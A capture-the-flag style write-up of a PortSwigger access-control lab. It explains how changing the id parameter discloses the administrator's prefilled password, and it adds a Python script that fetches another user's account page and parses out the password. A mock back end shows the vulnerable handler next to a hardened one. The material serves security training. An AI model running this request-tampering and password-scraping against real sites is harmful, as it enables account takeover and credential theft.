User ID controlled by request parameter with password disclosure

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-password-disclosure

Description

This lab has a user account page that contains the current user's existing password, prefilled in a masked input.

To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

We start by logging in as the wiener user.

Looking at the request for the account page, we can see that the username 'wiener' is passed as the id parameter.

In the response the password is returned in cleartext, as the value of the masked input, so anyone who can read the response can read the password.

Since the server uses the id parameter to choose whose account to render, without checking that it matches the logged-in user, changing id to 'administrator' discloses the administrator's password:

Now we can log in as administrator, open the Admin panel and delete the user 'carlos', completing the lab.
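The following script is an added example, not part of the original write-up or of PortSwigger's lab code. It shows the two halves of the procedure above in code: a helper that builds and replays the account request with a chosen id, a parser that pulls the prefilled password out of the masked input, and a constructed stand-in for the lab back end that renders the page the vulnerable way (trusting the id parameter) next to a hardened version that binds the lookup to the session user and stops echoing the password. The base URL, the session cookie handling, the user store and the non-wiener passwords are assumptions for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode
from urllib.request import Request, urlopen


class PrefilledPasswordParser(HTMLParser):
    """Collects the value attribute of the first <input type="password"> that has one."""

    def __init__(self):
        super().__init__()
        self.password = None

    def handle_starttag(self, tag, attrs):
        if tag != "input" or self.password is not None:
            return
        a = dict(attrs)  # HTMLParser already unescapes attribute values
        if (a.get("type") or "").lower() == "password" and a.get("value"):
            self.password = a["value"]


def extract_prefilled_password(page_html):
    """Return the prefilled password from an account page, or None if there is none."""
    parser = PrefilledPasswordParser()
    parser.feed(page_html)
    parser.close()
    return parser.password


def account_url(base_url, user_id):
    """The account page URL with the attacker-chosen id parameter (path is an assumption)."""
    return f"{base_url.rstrip('/')}/my-account?{urlencode({'id': user_id})}"


def fetch_account_page(base_url, user_id, session_cookie):
    """Replay the account request as the logged-in wiener user but with another id.

    Needs network access and a valid session cookie; not exercised offline.
    """
    req = Request(account_url(base_url, user_id),
                  headers={"Cookie": f"session={session_cookie}"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed user store standing in for the lab back end. Only wiener:peter comes
# from the lab; the other passwords are placeholders for the example.
USERS = {
    "wiener": "peter",
    "administrator": "constructed-admin-secret",
    "carlos": "constructed-carlos-secret",
}


def render_account_page_vulnerable(session_user, requested_id):
    """Lab behaviour: the id query parameter alone decides whose password is rendered."""
    pw = USERS[requested_id]  # session_user is never consulted
    return (f"<h1>My Account</h1><p>Your username is: {html.escape(requested_id)}</p>"
            f'<input required type="password" name="password" value="{html.escape(pw)}">')


def render_account_page_fixed(session_user, requested_id):
    """Hardened: the lookup is bound to the authenticated user and the password is not echoed."""
    if requested_id != session_user:
        raise PermissionError("requested account does not belong to the session user")
    return (f"<h1>My Account</h1><p>Your username is: {html.escape(session_user)}</p>"
            '<input required type="password" name="password" value="">')


if __name__ == "__main__":
    # Offline walk-through of the attack against the constructed back end.
    leaked = extract_prefilled_password(render_account_page_vulnerable("wiener", "administrator"))
    print("administrator password leaked via id parameter:", leaked)
    try:
        render_account_page_fixed("wiener", "administrator")
    except PermissionError as e:
        print("hardened handler refused:", e)
```

Against the real lab you would call fetch_account_page with your lab URL, the id "administrator" and the session cookie Burp shows for the wiener login, then pass the body to extract_prefilled_password. The fix is not to hide the parameter but to derive the account from the session and drop the password from the response entirely.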
